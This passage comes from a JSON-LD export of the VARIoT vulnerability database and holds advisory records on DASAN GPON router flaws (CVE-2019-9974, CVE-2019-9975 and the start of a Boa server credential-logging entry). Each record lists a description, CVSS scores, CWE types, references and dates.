"id": "JVNDB-2017-012245"
},
{
"date": "2018-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"date": "2024-11-21T03:19:14.607000",
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON ONT WiFi Router H640X Device buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
}
],
"trust": 0.6
}
}
VAR-201904-0121
Vulnerability from variot - Updated: 2024-11-23 22:12diag_tool.cgi on DASAN H660RM GPON routers with firmware 1.03-0022 lacks any authorization check, which allows remote attackers to run a ping command via a GET request to enumerate LAN devices or crash the router with a DoS attack. DASAN H660RM GPON There is an authorization vulnerability in the router firmware.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. There is an authorization problem vulnerability in the diag_tool.cgi file in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0121",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9974",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-9974",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-161409",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-9974",
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9974",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-9974",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1032",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-161409",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "diag_tool.cgi on DASAN H660RM GPON routers with firmware 1.03-0022 lacks any authorization check, which allows remote attackers to run a ping command via a GET request to enumerate LAN devices or crash the router with a DoS attack. DASAN H660RM GPON There is an authorization vulnerability in the router firmware.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. There is an authorization problem vulnerability in the diag_tool.cgi file in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9974"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "VULHUB",
"id": "VHN-161409"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-161409",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9974",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-161409",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"id": "VAR-201904-0121",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.603000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-862",
"trust": 1.1
},
{
"problemtype": "CWE-285",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://blog.burghardt.pl/2019/03/diag_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-allows-spawning-ping-processes-without-any-authorization-leading-to-information-disclosure-and-dos-attacks/"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/mar/41"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9974"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9974"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161409"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"date": "2019-04-11T19:29:01.503000",
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-161409"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"date": "2024-11-21T04:52:42.743000",
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM GPON Authorization vulnerability in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
}
}
VAR-201904-0122
Vulnerability from variot - Updated: 2024-11-23 22:12DASAN H660RM devices with firmware 1.03-0022 use a hard-coded key for logs encryption. Data stored using this key can be decrypted by anyone able to access this key. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. A trust management issue vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0122",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9975",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-9975",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-161410",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-9975",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9975",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-9975",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1030",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-161410",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM devices with firmware 1.03-0022 use a hard-coded key for logs encryption. Data stored using this key can be decrypted by anyone able to access this key. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. A trust management issue vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9975"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "VULHUB",
"id": "VHN-161410"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9975",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-161410",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"id": "VAR-201904-0122",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.577000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://blog.burghardt.pl/2019/03/syslog_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-uses-a-hard-coded-key-for-logs-encryption/"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/mar/41"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9975"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9975"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161410"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"date": "2019-04-11T19:29:01.567000",
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-12T00:00:00",
"db": "VULHUB",
"id": "VHN-161410"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"date": "2019-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"date": "2024-11-21T04:52:42.890000",
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM Vulnerabilities related to the use of hard-coded credentials in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
}
}
VAR-201904-0123
Vulnerability from variot - Updated: 2024-11-23 22:12The Boa server configuration on DASAN H660RM devices with firmware 1.03-0022 logs POST data to the /tmp/boa-temp file, which allows logged-in users to read the credentials of administration web interface users. DASAN H660RM The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. A trust management issue vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
